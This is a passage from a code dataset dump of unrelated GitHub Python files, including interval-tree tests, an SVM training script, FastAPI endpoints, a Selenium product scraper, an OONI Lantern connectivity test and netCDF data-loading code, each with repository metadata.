uqbar.io.Timer() as timer:\n found_by_search = set(interval_tree.find_intersection(offset))\n optimized += timer.elapsed_time\n with uqbar.io.Timer() as timer:\n found_by_brute_force = set()\n for _ in interval_tree:\n if _.start_offset <= offset < _.stop_offset:\n found_by_brute_force.add(_)\n brute_force += timer.elapsed_time\n assert found_by_search == found_by_brute_force\n factor = \"{:0.6f}\".format(optimized / brute_force) if brute_force else \"NaN\"\n print(f\"D: {factor} O: {optimized} B: {brute_force}\")\n\n\n@pytest.mark.parametrize(\"accelerated\", [True, False])\ndef test_find_intersection_with_interval(accelerated):\n iterations = 10\n count, range_ = 10, 15\n target_intervals = make_target_intervals(range_=range_)\n for i in range(iterations):\n print(\"Iteration:\", i)\n intervals = make_random_intervals(count=count, range_=range_)\n interval_tree = make_interval_tree(accelerated=accelerated, intervals=intervals)\n optimized = 0.0\n brute_force = 0.0\n for target_interval in target_intervals:\n with uqbar.io.Timer() as timer:\n found_by_search = set(interval_tree.find_intersection(target_interval))\n optimized += timer.elapsed_time\n with uqbar.io.Timer() as timer:\n found_by_brute_force = set()\n for _ in interval_tree:\n if (\n _.start_offset <= target_interval.start_offset\n and target_interval.start_offset < _.stop_offset\n ):\n found_by_brute_force.add(_)\n elif (\n target_interval.start_offset <= _.start_offset\n and _.start_offset < target_interval.stop_offset\n ):\n found_by_brute_force.add(_)\n brute_force += timer.elapsed_time\n assert found_by_search == found_by_brute_force\n factor = \"{:0.6f}\".format(optimized / brute_force) if brute_force else \"NaN\"\n print(f\"D: {factor} O: {optimized} B: {brute_force}\")\n\n\n@pytest.mark.parametrize(\"accelerated\", [True, False])\ndef test_find_intervals_starting_at(accelerated):\n iterations = 100\n count, range_ = 10, 15\n for i in range(iterations):\n print(\"Iteration:\", i)\n intervals = make_random_intervals(count=count, range_=range_)\n interval_tree = make_interval_tree(accelerated=accelerated, intervals=intervals)\n for offset in range(range_):\n found_by_search = set(interval_tree.find_intervals_starting_at(offset))\n found_by_brute_force = set()\n for _ in interval_tree:\n if _.start_offset == offset:\n found_by_brute_force.add(_)\n assert found_by_search == found_by_brute_force\n\n\n@pytest.mark.parametrize(\"accelerated\", [True, False])\ndef test_find_intervals_stopping_at(accelerated):\n iterations = 100\n count, range_ = 10, 15\n for i in range(iterations):\n print(\"Iteration:\", i)\n intervals = make_random_intervals(count=count, range_=range_)\n interval_tree = make_interval_tree(accelerated=accelerated, intervals=intervals)\n for offset in range(range_):\n found_by_search = set(interval_tree.find_intervals_stopping_at(offset))\n found_by_brute_force = set()\n for _ in interval_tree:\n if _.stop_offset == offset:\n found_by_brute_force.add(_)\n assert found_by_search == found_by_brute_force\n\n\n@pytest.mark.parametrize(\"accelerated\", [True, False])\ndef test_get_moment_at(accelerated):\n iterations = 100\n count, range_ = 10, 15\n for i in range(iterations):\n print(\"Iteration:\", i)\n intervals = make_random_intervals(count=count, range_=range_)\n interval_tree = make_interval_tree(accelerated=accelerated, intervals=intervals)\n fixtures = make_moment_fixtures(range_=range_, intervals=intervals)\n for offset in range(range_):\n overlaps, starts, stops = fixtures[offset]\n expected = Moment(\n overlap_intervals=overlaps,\n start_offset=offset,\n start_intervals=starts,\n stop_intervals=stops,\n interval_tree=interval_tree,\n )\n actual = interval_tree.get_moment_at(offset)\n assert expected.interval_tree is actual.interval_tree\n assert expected.start_offset == actual.start_offset\n assert expected.start_intervals == actual.start_intervals\n assert expected.stop_intervals == actual.stop_intervals\n assert expected.overlap_intervals == actual.overlap_intervals\n\n\n@pytest.mark.parametrize(\"accelerated\", [True, False])\ndef test_get_start_offset(accelerated):\n iterations = 100\n count, range_ = 10, 15\n for i in range(iterations):\n print(\"Iteration:\", i)\n intervals = make_random_intervals(count=count, range_=range_)\n interval_tree = make_interval_tree(accelerated=accelerated, intervals=intervals)\n expected_offsets = make_expected_start_offsets(\n range_=range_, intervals=intervals\n )\n for interval in sorted(intervals):\n print(\" Interval:\", interval)\n for offset in range(-1, range_ + 1):\n print(\" Offset:\", offset)\n print(\" :\", expected_offsets[offset])\n expected_before, expected_after = expected_offsets[offset]\n actual_before = interval_tree.get_start_offset_before(offset)\n actual_after = interval_tree.get_start_offset_after(offset)\n assert expected_before == actual_before, offset\n assert expected_after == actual_after, offset\n\n\n@pytest.mark.parametrize(\"accelerated\", [True, False])\ndef test_index(accelerated):\n intervals = make_intervals()\n interval_tree = make_interval_tree(accelerated=accelerated, populated=True)\n assert interval_tree.index(intervals[0]) == 0\n assert interval_tree.index(intervals[1]) == 2\n assert interval_tree.index(intervals[2]) == 1\n assert interval_tree.index(intervals[3]) == 3\n assert interval_tree.index(intervals[4]) == 4\n with pytest.raises(ValueError):\n interval = Interval(-100, 100)\n interval_tree.index(interval)\n\n\n@pytest.mark.parametrize(\"accelerated\", [True, False])\ndef test_insert(accelerated):\n interval_tree = make_interval_tree(accelerated=accelerated, populated=False)\n interval_tree.add(Interval(1, 3))\n interval_tree.update((Interval(0, 4), Interval(2, 6)))\n assert interval_tree[:] == [\n Interval(start_offset=0, stop_offset=4),\n Interval(start_offset=1, stop_offset=3),\n Interval(start_offset=2, stop_offset=6),\n ]\n\n\n@pytest.mark.parametrize(\"accelerated\", [True, False])\ndef test_iterate_moments(accelerated):\n interval_tree = make_interval_tree(accelerated=accelerated, populated=True)\n moments = list(interval_tree.iterate_moments())\n assert [x.start_offset for x in moments] == [0, 1, 2, 6]\n moments = list(interval_tree.iterate_moments(reverse=True))\n assert [x.start_offset for x in moments] == [6, 2, 1, 0]\n\n\n@pytest.mark.parametrize(\"accelerated\", [True, False])\ndef test_remove(accelerated):\n intervals = make_intervals()\n interval_tree = make_interval_tree(accelerated=accelerated, populated=True)\n assert list(interval_tree) == sorted(intervals)\n with pytest.raises(ValueError):\n interval_tree.remove(intervals[1:-1])\n assert list(interval_tree) == sorted(intervals)\n for interval in interval_tree[1:-1]:\n interval_tree.remove(interval)\n assert interval_tree[:] == [\n Interval(start_offset=0, stop_offset=3),\n Interval(start_offset=6, stop_offset=9),\n ]\n\n\ndef test_get_offset_after():\n intervals = [\n Interval(0, 3),\n Interval(1, 3),\n Interval(1, 2),\n Interval(2, 5),\n Interval(5, 10),\n Interval(5, 12),\n Interval(6, 9),\n Interval(13, 15),\n ]\n expected = [\n (-2, 0.0),\n (-1, 0.0),\n (0, 1.0),\n (1, 2.0),\n (2, 3.0),\n (3, 5.0),\n (4, 5.0),\n (5, 6.0),\n (6, 9.0),\n (7, 9.0),\n (8, 9.0),\n (9, 10.0),\n (10, 12.0),\n (11, 12.0),\n (12, 13.0),\n (13, 15.0),\n (14, 15.0),\n (15, None),\n (16, None),\n ]\n for _ in range(10):\n interval_tree = IntervalTree(intervals)\n actual = [(i, interval_tree.get_offset_after(i)) for i in range(-2, 17)]\n assert actual == expected\n random.shuffle(intervals)\n","repo_name":"josiah-wolf-oberholtzer/supriya","sub_path":"tests/utils/test_intervals_IntervalTree.py","file_name":"test_intervals_IntervalTree.py","file_ext":"py","file_size_in_byte":15467,"program_lang":"python","lang":"en","doc_type":"code","stars":224,"dataset":"github-code","pt":"53"} +{"seq_id":"15298077006","text":"\nimport sys\nimport os\nimport pickle\n\n\nfrom sklearn.cluster import KMeans\nfrom sklearn.svm import SVC\nfrom sklearn.model_selection import train_test_split, GridSearchCV\nfrom sklearn.metrics import confusion_matrix,accuracy_score\n\n\n\ndef train_clustering(input_data, clustering_calgo = KMeans , K = 256):\n \"\"\"\n input_data: The data which we apply clustering on.\n clustering_algo: The algorithm for clustering\n K : number of clusters \n \"\"\"\n model_name = 'kmeans_model.pkl'\n if os.path.exists(model_name): \n model = pickle.load(open(model_name, 'rb'))\n return model \n else: \n model = clustering_calgo(n_clusters = K) # %56 with K=128\n model.fit(input_data)\n pickle.dump(model, open(model_name, 'wb'))\n return model\n\n\ndef SVM(preprocessed_image, image_labels):\n \"\"\"\n Load SVM if a trained model file was available, \n otherwise, train a new one using Grid Search \n with Cross Validation of 5 folds to find the \n most accurate hyperparameter for the \n classification.\n \"\"\"\n\n x_train, x_test, y_train, y_test = train_test_split(preprocessed_image, image_labels,\n test_size = .2, random_state = 14)\n grid = { \n 'C': [2**(-5), 2**(-4), 2**(-3), 2**(-2), 2**(-1), 1, 2, 4 ,8 ,16],\n 'kernel': ['linear', 'poly', 'rbf'],\n }\n pickle_file_name = 'best_param.pkl'\n model_name = 'model.sav'\n if os.path.exists(model_name): \n svm_clf = pickle.load(open(model_name, 'rb'))\n y_pred = svm_clf.predict(x_test)\n print(\"The test accuracy of the SVM model is: %\", accuracy_score(y_test, y_pred)*100)\n return svm_clf\n if os.path.exists(pickle_file_name):\n with open(pickle_file_name, 'rb') as handle:\n best_param = pickle.load(handle)\n svm_clf = SVC(**best_param)\n svm_clf.fit(x_train, y_train)\n y_pred = svm_clf.predict(x_test)\n print(\"The test accuracy of the SVM model is: %\",accuracy_score(y_test, y_pred)*100)\n pickle.dump(svm_clf, open(model_name, 'wb'))\n return svm_clf\n else: \n svm_cv = GridSearchCV(estimator=SVC(), param_grid=grid, cv= 5)\n svm_cv.fit(x_train, y_train)\n best_param = svm_cv.best_params_\n with open(pickle_file_name, 'wb') as handle:\n pickle.dump(svm_cv.best_params_, handle, protocol=pickle.HIGHEST_PROTOCOL)\n svm_clf = SVC(**best_param)\n svm_clf.fit(x_train, y_train)\n y_pred = svm_clf.predict(x_test)\n print(\"The test accuracy of the SVM model is: %\",accuracy_score(y_test, y_pred)*100)\n pickle.dump(svm_clf, open(model_name, 'wb'))\n return svm_clf","repo_name":"MahdiRahbar/Comic_Book_Classification","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2723,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13396688275","text":"from typing import Any, List\n\nfrom fastapi import APIRouter, Depends, HTTPException, status\nfrom sqlalchemy.orm import Session\n\nfrom app import crud, models, schemas\nfrom app.api import deps\n\nrouter = APIRouter()\n\n\n@router.get(\"/\", response_model=List[schemas.Subsidiary])\ndef read_subsidiaries(\n skip: int = 0,\n limit: int = 50,\n current_user: models.User = Depends(deps.get_current_active_user),\n db: Session = Depends(deps.get_db)\n) -> Any:\n \"\"\"\n Read subsidiaries.\n \"\"\"\n subsidiaries = crud.subsidiary.get_multi(db, skip=skip, limit=limit)\n\n return subsidiaries\n\n\n@router.post(\"/\", response_model=schemas.Subsidiary)\ndef create_subsidiary(\n subsidiary_in: schemas.SubsidiaryCreate,\n current_user: models.User = Depends(deps.get_current_active_user),\n db: Session = Depends(deps.get_db)\n) -> Any:\n \"\"\"\n Create subsidiary.\n \"\"\"\n subsidiary = crud.subsidiary.create(db, obj_in=subsidiary_in)\n\n return subsidiary\n\n\n@router.get(\"/{subsidiary_id}\", response_model=schemas.Subsidiary)\ndef read_subsidiary(\n subsidiary_id: int,\n current_user: models.User = Depends(deps.get_current_active_user),\n db: Session = Depends(deps.get_db)\n) -> Any:\n \"\"\"\n Read subsidiary by id.\n \"\"\"\n subsidiary = crud.subsidiary.get(db, id=subsidiary_id)\n\n if not subsidiary:\n raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail=\"La sucursal no existe\")\n\n return subsidiary\n\n\n@router.delete(\"/{subsidiary_id}\", response_model=schemas.Subsidiary)\ndef delete_subsidiary(\n subsidiary_id: int,\n current_user: models.User = Depends(deps.get_current_active_user),\n db: Session = Depends(deps.get_db)\n) -> Any:\n \"\"\"\n Delete subsidiary.\n \"\"\"\n subsidiary = crud.subsidiary.get(db, id=subsidiary_id)\n\n if not subsidiary:\n raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail=\"La sucursal no existe\")\n\n subsidiary = crud.subsidiary.remove(db, id=subsidiary_id)\n\n return subsidiary\n\n\n@router.patch(\"/{subsidiary_id}\", response_model=schemas.Subsidiary)\ndef update_subsidiary(\n subsidiary_id: int,\n subsidiary_in: schemas.SubsidiaryUpdate,\n current_user: models.User = Depends(deps.get_current_active_user),\n db: Session = Depends(deps.get_db)\n) -> Any:\n \"\"\"\n Update subsidiary.\n \"\"\"\n subsidiary = crud.subsidiary.get(db, id=subsidiary_id)\n\n if not subsidiary:\n raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail=\"La sucursal no existe\")\n\n subsidiary = crud.subsidiary.update(db, db_obj=subsidiary, obj_in=subsidiary_in)\n\n return subsidiary\n","repo_name":"WilfredoHQ/fastapi-money-transfer","sub_path":"app/api/api_v1/endpoints/subsidiaries.py","file_name":"subsidiaries.py","file_ext":"py","file_size_in_byte":2605,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74023457448","text":"import sys\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.common.by import By\n\nfrom selenium.webdriver.chrome.service import Service\nfrom webdriver_manager.chrome import ChromeDriverManager\nfrom selenium.webdriver.chrome.options import Options\n\nimport time \nfrom selenium.webdriver.common.action_chains import ActionChains\n\nimport pandas as pd\n#import openpyxl\n\nproduct_links = []\nproduct_names = []\nproduct_prices = []\nproduct_descriptions = []\nproduct_imglinks = []\n\noptions = Options()\noptions.add_argument(\"start-maximized\")\noptions.add_experimental_option('excludeSwitches', ['enable-logging'])\ndriver = webdriver.Chrome(service=Service(ChromeDriverManager().install()), options=options)\n\nfor page in range(1, 5):\n\tpage_url = \"https://www.bradburnhome.com/collections/casual?page=\" + str(page)\n\tprint(page)\n \n\tdriver.get(page_url)\n\n\tproducts = driver.find_elements(By.CLASS_NAME, \"eight\")\n\tprint(len(products))\n\n\t\n\tfor i in range(len(products)):\n\t\tproduct_link = products[i].find_element(By.TAG_NAME, 'a').get_attribute('href')\n\t\tprint(product_link)\n\t\tproduct_links.append(product_link)\n\nfor i in range(len(product_links)):\n\tdriver.get(product_links[i])\n\tproduct_name = driver.find_element(By.CLASS_NAME, \"product_name\").get_attribute('innerHTML')\n\tproduct_names.append(product_name)\n\n\tproduct_price = driver.find_element(By.CLASS_NAME, \"money\").get_attribute('innerHTML')\n\tproduct_prices.append(product_price)\n\n\tproduct_imglink = driver.find_element(By.CLASS_NAME, \"fancybox\").get_attribute('href')\n\tproduct_imglinks.append(product_imglink)\n\n\tproduct_description_driver = driver.find_element(By.CLASS_NAME, \"description\")\n\tproduct_description = product_description_driver.find_element(By.TAG_NAME, 'p').get_attribute('innerHTML')\n\tproduct_descriptions.append(product_description)\n\n\tproduct_table = product_description_driver.find_element(By.TAG_NAME, 'table')\n\tproduct_table_rows = product_table.find_elements(By.TAG_NAME, 'tr')\n\n\n\t# for index in range(len(product_table_rows)):\n\t# \tproduct_table_cols = product_table_rows[index].find_elements(By.TAG_NAME, 'td')\n\t# \tproduct_table_col_name = product_table_cols[0].text\n\t# \tproduct_table_col_content = product_table_cols[1].text\n\n\n\t\n\n\n\n\n\n#product_titles.append(product_title)\n\ndf = pd.DataFrame({'product_name': product_names, 'product_price': product_prices, 'product_description': product_descriptions, 'product_imglink': product_imglinks}) # Create a DF with the lists\n\nwith pd.ExcelWriter('output1.xlsx') as writer:\n df.to_excel(writer, sheet_name='Sheet1')\n\n","repo_name":"Jane011223/Scraping-templates-using-selenium-python","sub_path":"selenium-general.py","file_name":"selenium-general.py","file_ext":"py","file_size_in_byte":2582,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"13665620962","text":"import h5py as h5\nimport numpy as np\nimport os.path as osp\nimport glob\nimport tqdm\nimport argparse\n\ndef get_arguments():\n parser = argparse.ArgumentParser()\n parser.add_argument(\n '--feat_folder',\n default='/home/pardogl/datasets/movies/youtube/',\n type=str,\n help='Path to folder contain all video folders')\n parser.add_argument(\n '--out_path',\n default='/home/pardogl/datasets/movies/',\n type=str)\n parser.add_argument(\n '--suffix_features',\n type=str, help='Suffix of npy features name')\n parser.add_argument(\n '--out_name',\n default='/home/pardogl/datasets/movies/',\n type=str)\n return parser.parse_args()\n\n\ndef npy2h5(feat_folder, out_path, suffix_features, out_name):\n features_path = (f'{feat_folder}/*')\n videos = glob.glob(f'{features_path}/*{suffix_features}.npy')\n print(f'{len(videos)} features found')\n features = []\n names = []\n for video in tqdm.tqdm(videos):\n feature = np.load(open(video,'rb'))\n features.append(feature)\n name = osp.basename(video).replace(f'{suffix_features}.npy','')\n names.append(name)\n\n print('Saving hdf5 file')\n with h5.File(f'{out_path}/{out_name}.h5','w') as f:\n for name, feature in tqdm.tqdm(zip(names, features), total=len(names)):\n f.create_dataset(name, data=feature, chunks=True)\n\nif __name__ == \"__main__\":\n args = get_arguments()\n npy2h5(args.feat_folder, args.out_path, args.suffix_features, args.out_name)\n","repo_name":"PardoAlejo/head-pose-feature-extractor","sub_path":"code/npy2hdf5.py","file_name":"npy2hdf5.py","file_ext":"py","file_size_in_byte":1536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16490164067","text":"import json\n\nfrom django.shortcuts import (\n render,\n)\nfrom django.views import (\n View,\n)\n\n\nclass Task1View(View):\n \"\"\"\n Вывести список всех рецептов. Список должен содержать информацию о самом рецепте, авторе\n \"\"\"\n\n def get(self, request, **kwargs):\n data = {\n 'response': 'some data task 1',\n }\n\n return render(request, 'task.html', {'json_data': json.dumps(data)})\n\n\nclass Task2View(View):\n \"\"\"\n Вывести детальную информацию рецепта. Нужно получить информацию о самом рецепте, о шагах приготовления, списке\n необходимых продоктов для приготовления\n \"\"\"\n\n def get(self, request, **kwargs):\n data = {\n 'response': 'some data task 2',\n }\n\n return render(request, 'task.html', {'json_data': json.dumps(data)})\n\n\nclass Task3View(View):\n \"\"\"\n Вывести список рецептов, аналогичный заданию 1, только дополнительно должно быть выведено количество лайков. Сам\n список должен быть отсортирован по количеству лайков по убыванию\n \"\"\"\n\n def get(self, request, **kwargs):\n data = {\n 'response': 'some data task 3',\n }\n\n return render(request, 'task.html', {'json_data': json.dumps(data)})\n\n\nclass Task4View(View):\n \"\"\"\n Вывести объединенный список TOP 3 авторов и TOP 3 голосующих с количеством рецептов для первых и количеством\n голосов для вторых. В выборке должен быть указан тип в отдельной колонкке - Автор или Пользователь.\n \"\"\"\n\n def get(self, request, **kwargs):\n data = {\n 'response': 'some data task 4',\n }\n\n return render(request, 'task.html', {'json_data': json.dumps(data)})\n\n\nclass Task5View(View):\n \"\"\"\n Все продукты указаны для приготовления одной порции блюда. Необходимо вывести список необходимых про��уктов для\n приготовления самостоятельно выбранного блюда в количестве 5-ти порций\n \"\"\"\n\n def get(self, request, **kwargs):\n data = {\n 'response': 'some data task 5',\n }\n\n return render(request, 'task.html', {'json_data': json.dumps(data)})\n\n\n\n","repo_name":"sandanilenko/peerocks","sub_path":"peerocks/peerocks/apps/common/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2768,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7577543025","text":"import os\nimport distutils.spawn\n\nfrom twisted.internet import defer, reactor\nfrom twisted.internet.endpoints import TCP4ClientEndpoint\nfrom twisted.web.client import ProxyAgent, readBody\nfrom twisted.python import usage\n\nfrom ooni.templates.process import ProcessTest, ProcessDirector\nfrom ooni.utils import log, net\nfrom ooni.errors import handleAllFailures\n\nclass LanternNotInstalled(Exception):\n pass\n\nclass UsageOptions(usage.Options):\n optParameters = [\n ['url', 'u', net.GOOGLE_HUMANS[0],\n 'Specify the URL to fetch over lantern (default: http://www.google.com/humans.txt).'],\n ['expected-body', 'e', net.GOOGLE_HUMANS[1],\n 'Specify the beginning of the expected body in the response (default: ' + net.GOOGLE_HUMANS[1] + ').']\n ]\n\nclass LanternTest(ProcessTest):\n \"\"\"\n This class tests Lantern (https://getlantern.org).\n\n test_lantern_circumvent\n Starts Lantern on Linux in --headless mode and\n determine if it bootstraps successfully or not.\n Then, make a HTTP request for http://google.com\n and records the response body or failure string.\n\n \"\"\"\n\n name = \"Lantern Circumvention Tool Test\"\n description = \"Bootstraps Lantern, connects to a URL and verifies if it \"\\\n \"contains the expected input.\"\n author = \"Aaron Gibson\"\n version = \"0.1.0\"\n timeout = 120\n usageOptions = UsageOptions\n\n def requirements(self):\n if not distutils.spawn.find_executable(\"lantern\"):\n raise LanternNotInstalled('lantern is not installed')\n\n def setUp(self):\n self.report['body'] = None\n self.report['failure'] = None\n self.report['success'] = None\n self.report['default_configuration'] = True\n\n self.command = [distutils.spawn.find_executable(\"lantern\"), \"--headless\"]\n self.bootstrapped = defer.Deferred()\n self.exited = False\n\n self.url = self.localOptions['url']\n if self.url != net.GOOGLE_HUMANS[0]:\n self.report['default_configuration'] = False\n\n if self.localOptions['expected-body'] != net.GOOGLE_HUMANS[1]:\n self.report['default_configuration'] = False\n\n def stop(self, reason=None):\n if not self.exited:\n self.processDirector.close()\n self.processDirector.transport.signalProcess('TERM')\n self.exited = True\n\n def handleRead(self, stdout=None, stderr=None):\n \"\"\"\n This is called with each chunk of data from stdout and stderr.\n \"\"\"\n if not self.bootstrapped.called and \"Successfully dialed via\" in self.processDirector.stdout:\n log.msg(\"Lantern connection successful\")\n self.processDirector.cancelTimer()\n self.bootstrapped.callback(\"bootstrapped\")\n\n def test_lantern_circumvent(self):\n def addResultToReport(result):\n self.report['body'] = result\n if result.startswith(self.localOptions['expected-body']):\n log.msg(\"Got the HTTP response body I expected!\")\n self.report['success'] = True\n else:\n self.report['success'] = False\n\n def addFailureToReport(failure):\n log.err(\"Failed to connect to lantern\")\n log.failure(failure)\n self.report['failure'] = handleAllFailures(failure)\n self.report['success'] = False\n\n def doRequest(noreason):\n proxyEndpoint = TCP4ClientEndpoint(reactor, '127.0.0.1', 8787)\n agent = ProxyAgent(proxyEndpoint, reactor)\n log.msg(\"Doing HTTP request via Lantern (127.0.0.1:8787) for %s\" % self.url)\n request = agent.request(\"GET\", self.url)\n request.addCallback(readBody)\n request.addCallback(addResultToReport)\n request.addCallback(self.processDirector.close)\n return request\n\n self.bootstrapped.addCallback(doRequest)\n self.bootstrapped.addErrback(addFailureToReport)\n self.bootstrapped.addBoth(self.stop)\n self.d = self.run(self.command, env=os.environ, usePTY=1)\n return self.d\n","repo_name":"ooni/probe-legacy","sub_path":"ooni/nettests/third_party/lantern.py","file_name":"lantern.py","file_ext":"py","file_size_in_byte":4108,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"53"} +{"seq_id":"20857349369","text":"from django.contrib import admin\nfrom writer.models import Section, Writer\n\nclass SectionAdmin(admin.ModelAdmin):\n search_fields = ['section', 'section_slug']\n list_display = ['section', 'section_slug', 'display_count']\n \nclass WriterAdmin(admin.ModelAdmin):\n search_fields = ['first_name', 'last_name', 'name_slug']\n #prepopulated_fields = {'name_slug': ('first_name', 'last_name')}\n fieldsets = (\n ('Section', {\n 'fields': ('section',)\n }),\n ('Writer', {\n 'fields': ('first_name', 'last_name', 'name_slug', 'title','photo', 'on_staff')\n }),\n )\n list_display = ['last_name', 'first_name', 'section', 'name_slug', 'title', 'on_staff']\n list_editable = ['on_staff']\n list_filter = ['on_staff', 'section']\n \n#class SectionChoiceAdmin(admin.ModelAdmin):\n# search_fields = ['section',]\n# list_display = ['section', 'display_count']\n \nadmin.site.register(Section, SectionAdmin)\nadmin.site.register(Writer, WriterAdmin)\n","repo_name":"smosqueda/djangocms-sarah","sub_path":"writer/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1006,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24260126846","text":"import json\nimport argparse\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--benchmark\", type=str, default=\"tpch\", choices=['tpch', 'santos_large_tpch', 'tpch_groundtruth', 'tpch_small', 'tpch_large',\n 't2d_gold', 'TUS_t2d_gold', 'wdc_t2d_gold'])\n hp = parser.parse_args()\n\n with open(\"%s/runtimes_genT.json\"%(hp.benchmark)) as timesJson:\n all_runtimes = json.load(timesJson)\n \n total_runtime = []\n for sTable, timesDict in all_runtimes.items():\n if '.csv' not in sTable: continue\n if \"all\" not in timesDict or \"table_integration\" not in timesDict: continue\n total_runtime.append(timesDict[\"all\"]+timesDict[\"table_integration\"])\n print(\"For %d Source Tables, the Average Runtimes (sec) is %.3f\" % (len(total_runtime), sum(total_runtime)/len(total_runtime)))","repo_name":"northeastern-datalab/gen-t","sub_path":"code/experiment_logs/analyzeRuntimes.py","file_name":"analyzeRuntimes.py","file_ext":"py","file_size_in_byte":925,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27487938484","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Mar 4 11:11:48 2019\n\n@author: anthonys\n\"\"\"\n\n\n\n\n\n#from netCDF4 import Dataset\nimport numpy as np \n#import struct \n#import netCDF4\nfrom netCDF4 import Dataset\n#import netCDF4 as nc\n#import collections\nimport matplotlib.pyplot as plt\nplt.rcParams.update({'figure.max_open_warning': 0})\n#from scipy.io import netcdf\n#import scipy as sp\n#import glob\n#import os\n#import sys\nfrom mpl_toolkits import mplot3d\nfrom scipy.optimize import curve_fit\nfrom scipy.interpolate import interp1d\nimport time\n#import pkgutil\n#import collections\n#from collections import Counter\nfrom scipy.spatial import ConvexHull\nimport cProfile\n\n#import overlap_calculation\n\nstart=time.time()\n\n\n#############################################################################\n\n# definitions\ndef pyth(u,v): # magnitude\n return np.sqrt(u*u+v*v)\n \n\ndef rb1(grad,ht,w,one,width):\n #return 1/(abs(grad)*ht*(1/width*np.maximum(abs(w),one))+1)\n return 1/ ( (abs(grad)*ht) / (width*np.maximum(abs(w),one) ) +1 )\n\n\n\n################################################################################\n# importing files\n\nbomexd = Dataset(\"/data/bomex/bomex.default.0000000.nc\",\"r\")\nbomexql = Dataset(\"/data/bomex/bomex.ql.0000000.nc\",\"r\")\nbomexqlcore = Dataset(\"/data/bomex/bomex.qlcore.0000000.nc\",\"r\")\nbomextrack18 = Dataset('/data/bomex/l.0001800.track.nc','r')\nbomextrack36 = Dataset('/data/bomex/l.0003600.track.nc','r')\nbomextrack54 = Dataset('/data/bomex/l.0005400.track.nc','r')\nbomextrack72 = Dataset('/data/bomex/l.0007200.track.nc','r')\nbomextrack90 = Dataset('/data/bomex/l.0009000.track.nc','r')\nbomextrack108 = Dataset('/data/bomex/l.0010800.track.nc','r')\nbomextrack126 = Dataset('/data/bomex/l.0012600.track.nc','r')\nbomextrack144 = Dataset('/data/bomex/l.0014400.track.nc','r')\nbomextrack162 = Dataset('/data/bomex/l.0016200.track.nc','r')\nbomextrack180 = Dataset('/data/bomex/l.0018000.track.nc','r')\nbomextrack198 = Dataset('/data/bomex/l.0019800.track.nc','r')\nbomextrack216 = Dataset('/data/bomex/l.0021600.track.nc','r')\n\nbomextrack342 = Dataset('/data/bomex/l.0034200.track.nc','r')\nbomextrack360 = Dataset('/data/bomex/l.0036000.track.nc','r')\n\n\nricod = Dataset(\"/data/rico/rico.default.0000000.nc\",\"r\")\nricoql = Dataset(\"/data/rico/rico.ql.0000000.nc\",\"r\")\nricoqlcore = Dataset(\"/data/rico/rico.qlcore.0000000.nc\",\"r\")\nricotrack36 = Dataset('/data/rico/l.0003600.track.nc','r')\nricotrack72 = Dataset('/data/rico/l.0007200.track.nc','r')\nricotrack108 = Dataset('/data/rico/l.0010800.track.nc','r')\nricotrack144 = Dataset('/data/rico/l.0014400.track.nc','r')\nricotrack180 = Dataset('/data/rico/l.0018000.track.nc','r')\nricotrack216 = Dataset('/data/rico/l.0021600.track.nc','r')\nricotrack252 = Dataset('/data/rico/l.0025200.track.nc','r')\nricotrack288 = Dataset('/data/rico/l.0028800.track.nc','r')\nricotrack324 = Dataset('/data/rico/l.0032400.track.nc','r')\nricotrack360 = Dataset('/data/rico/l.0036000.track.nc','r')\nricotrack396 = Dataset('/data/rico/l.0039600.track.nc','r')\n\nricotrack612 = Dataset('/data/rico/l.0061200.track.nc','r')\nricotrack828 = Dataset('/data/rico/l.0082800.track.nc','r')\nricotrack900 = Dataset('/data/rico/l.0090000.track.nc','r')\nricotrack1008 = Dataset('/data/rico/l.0100800.track.nc','r')\nricotrack1116 = Dataset('/data/rico/l.0111600.track.nc','r')\nricotrack1224 = Dataset('/data/rico/l.0122400.track.nc','r')\nricotrack1332 = Dataset('/data/rico/l.0133200.track.nc','r')\nricotrack1440 = Dataset('/data/rico/l.0144000.track.nc','r')\nricotrack1548 = Dataset('/data/rico/l.0154800.track.nc','r')\nricotrack1656 = Dataset('/data/rico/l.0165600.track.nc','r')\nricotrack1764 = Dataset('/data/rico/l.0176400.track.nc','r')\nricotrack1872 = Dataset('/data/rico/l.0187200.track.nc','r')\nricotrack1980 = Dataset('/data/rico/l.0198000.track.nc','r')\n\nricotrack2016 = Dataset('/data/rico/l.0201600.track.nc','r')\nricotrack2052 = Dataset('/data/rico/l.0205200.track.nc','r')\nricotrack2088 = Dataset('/data/rico/l.0208800.track.nc','r')\nricotrack2124 = Dataset('/data/rico/l.0212400.track.nc','r')\nricotrack2160 = Dataset('/data/rico/l.0216000.track.nc','r')\n\n\n\narmd = Dataset(\"/data/arm/arm.default.0000000.nc\",\"r\")\narmql = Dataset(\"/data/arm/arm.ql.0000000.nc\",\"r\")\narmqlcore = Dataset(\"/data/arm/arm.qlcore.0000000.nc\",\"r\")\narmtrack108 = Dataset('/data/arm/l.0010800.track.nc','r')\narmtrack126 = Dataset('/data/arm/l.0012600.track.nc','r')\narmtrack144 = Dataset('/data/arm/l.0014400.track.nc','r')\narmtrack162 = Dataset('/data/arm/l.0016200.track.nc','r')\narmtrack180 = 